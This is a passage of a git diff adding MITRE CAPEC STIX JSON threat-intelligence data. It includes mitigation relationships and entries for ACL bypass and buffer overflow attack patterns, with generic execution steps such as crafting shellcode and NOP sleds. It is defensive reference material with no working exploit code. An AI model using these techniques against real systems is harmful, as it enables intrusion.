"attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json new file mode 100644 index 0000000000000000000000000000000000000000..974f7ee6a22506fec862c70ee389dafec7f05a5d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ff8ccce6-92b5-43da-81bf-6559100321b4.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--b708b9eb-a72d-41d5-b5cd-0c35eaf16311", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff8ccce6-92b5-43da-81bf-6559100321b4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69b6bab3-0a47-402a-b11e-6f7897b75465", + "target_ref": "attack-pattern--51cf3883-1993-49d1-a6c6-169cabf71adb", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json new file mode 100644 index 0000000000000000000000000000000000000000..5c36f5c135c9ecb076f6394edba5cfd30ada8075 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffb905de-a976-4ece-aa2c-96b818a64df0.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--9a3cd48a-9338-4770-92f3-93b51bb952bc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json new file mode 100644 index 0000000000000000000000000000000000000000..ff8225542638860ce0a46883de6daff747d26e25 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--fc5a2f7b-40c2-4e09-9ccd-5c40d190f48a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffba3f90-bbb1-4ab0-bf6a-750ca56acabd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json new file mode 100644 index 0000000000000000000000000000000000000000..dcc76eda7a33103156bff64aefcaba8f94b80a08 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/relationship/relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e.json @@ -0,0 +1,21 @@ +{ + "id": "bundle--4ef8da62-a430-4819-8f60-08690b779b84", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffcda0d4-63d6-4980-9ad1-5627a39ccb6e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--676ce84f-78c4-40f9-96e2-d65ddbfb6b69", + "target_ref": "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "type": "relationship", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json b/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json new file mode 100644 index 0000000000000000000000000000000000000000..1169eb1ce124c8b4dd8a244c4e415a694cdfa8da --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/stix-capec.json @@ -0,0 +1,68809 @@ +{ + "id": "bundle--7783ea03-9f14-4d80-8b9a-c1a6ff015378", + "objects": [ + { + "created": "2023-01-30T20:31:22.120362Z", + "definition": { + "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright © 2007 - 2023, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "id": "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d", + "type": "marking-definition" + }, + { + "created": "2023-01-30T20:31:22.121Z", + "id": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "identity_class": "organization", + "modified": "2023-01-30T20:31:22.121Z", + "name": "The MITRE Corporation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "identity" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", + "external_references": [ + { + "external_id": "CAPEC-1", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/1.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-434", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/434.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1191", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1191.html" + }, + { + "external_id": "CWE-1193", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1193.html" + }, + { + "external_id": "CWE-1220", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1220.html" + }, + { + "external_id": "CWE-1297", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1297.html" + }, + { + "external_id": "CWE-1311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1311.html" + }, + { + "external_id": "CWE-1314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1314.html" + }, + { + "external_id": "CWE-1315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1315.html" + }, + { + "external_id": "CWE-1318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1318.html" + }, + { + "external_id": "CWE-1320", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1320.html" + }, + { + "external_id": "CWE-1321", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "external_id": "CWE-1327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1327.html" + }, + { + "description": "Hijack Execution Flow: ServicesFile Permissions Weakness", + "external_id": "T1574.010", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/010" + } + ], + "id": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Accessing Functionality Not Properly Constrained by ACLs", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey: The attacker surveys the target application, possibly as a valid and authenticated user

    2. Techniques
    Spidering web sites for all available links
    Brute force guessing of resource names
    Brute force guessing of user names / credentials
    Brute force guessing of function names / actions

  2. Identify Functionality: At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions

    3. Techniques
    Use the web inventory of all forms and inputs and apply attack data to those inputs.
    Use a packet sniffer to capture and record network traffic
    Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.

Experiment

  1. Iterate over access capabilities: Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.

    2. Techniques
    Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--74bac7d9-693d-40d2-82bf-eb132f13bcaf", + "attack-pattern--3ba20dcc-8fec-4d74-a472-eb9694fe8142", + "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b" + ], + "x_capec_prerequisites": [ + "The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.", + "The various resources, or individual URLs, must be somehow discoverable by the attacker", + "The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", + "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-1-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c796a053-8016-4098-9d01-e680e042cb24", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be", + "target_ref": "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the adversary finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.", + "external_references": [ + { + "external_id": "CAPEC-10", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/10.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-99", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/99.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "Buffer Overflow via Environment Variables", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_Overflow_via_Environment_Variables" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Sharefuzz", + "external_id": "REF-2", + "source_name": "reference_from_CAPEC", + "url": "http://sharefuzz.sourceforge.net" + } + ], + "id": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow via Environment Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. See also: CVE-1999-0906\n ", + "\n A buffer overflow in the rlogin program involves its consumption of the $TERM environmental variable. See also: CVE-1999-0046\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. In this attack the adversary looks for an application that loads the content of an environment variable into a buffer.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Change the values of environment variables thought to be used by the application to contain excessive data. If the program is loading the value of the environment variable into a buffer, this could cause a crash and an attack vector will be found.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_extended_description": "Although the focus of this attack is putting excessive content into an environment variable that is loaded into a buffer, environment variables can be used to assist a classic buffer overflow attack as well. In the case where the buffer used in a traditional buffer overflow attack is not large enough to store the adversary's shell code, they will store the shell code in an environment variable and attempt to return to its address, rather than back into the data they wrote to the buffer.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application uses environment variables.", + "An environment variable exposed to the user is vulnerable to a buffer overflow.", + "The vulnerable environment variable uses untrusted data.", + "Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not expose environment variable to the user.", + "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6afe60c3-f515-4128-a724-0989e27e5bb0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not use untrusted data in your environment variables.", + "id": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--371669b4-ddf9-41df-b755-093aa08a1c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--76f448da-5586-4aae-b516-46ff7c52ba87", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking", + "id": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5981e722-08a7-4513-8c85-f487b377ebfb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--950e1236-9a75-40d0-a5f7-1c1777109da5", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools such as Sharefuzz [REF-2] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", + "id": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-10-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d48d20f4-9361-40f9-81b3-74f2f8b86bea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a8c3aec-f2ce-4b6e-b416-33f58933ac90", + "target_ref": "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an adversary. As a consequence, an adversary is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the adversaries' choice.", + "external_references": [ + { + "external_id": "CAPEC-100", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/100.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-131", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/131.html" + }, + { + "external_id": "CWE-129", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/129.html" + }, + { + "external_id": "CWE-805", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "description": "Buffer Overflow", + "external_id": "07", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Buffer-Overflow" + }, + { + "description": "Buffer overflow attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Buffer_overflow_attack" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-620", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" + } + ], + "id": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overflow Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.", + "Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

    2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

  2. Craft overflow content: The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

    3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "attack-pattern--d591235a-da3b-4872-8962-27fe44fa1ab0", + "attack-pattern--4b856ceb-8bf7-4f0e-b423-89a420455b1d", + "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "attack-pattern--5d5ff43b-cbe7-4986-bfec-cf979f97e6b9", + "attack-pattern--8e403d18-af4e-4abd-bd38-0f99f74b4636", + "attack-pattern--e61f5dd9-d26e-454f-ab07-171f3dea6e73", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623", + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33" + ], + "x_capec_prerequisites": [ + "Targeted software performs buffer operations.", + "Targeted software inadequately performs bounds-checking on buffer operations.", + "Adversary has the capability to influence the input to buffer operations." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system." + ], + "x_capec_skills_required": { + "High": "In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.", + "Low": "In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a language or compiler that performs automatic bounds checking.", + "id": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-100-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cedea035-6835-4307-a59b-acd58ec23ecd", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use secure functions not vulnerable to buffer overflow.", + "id": 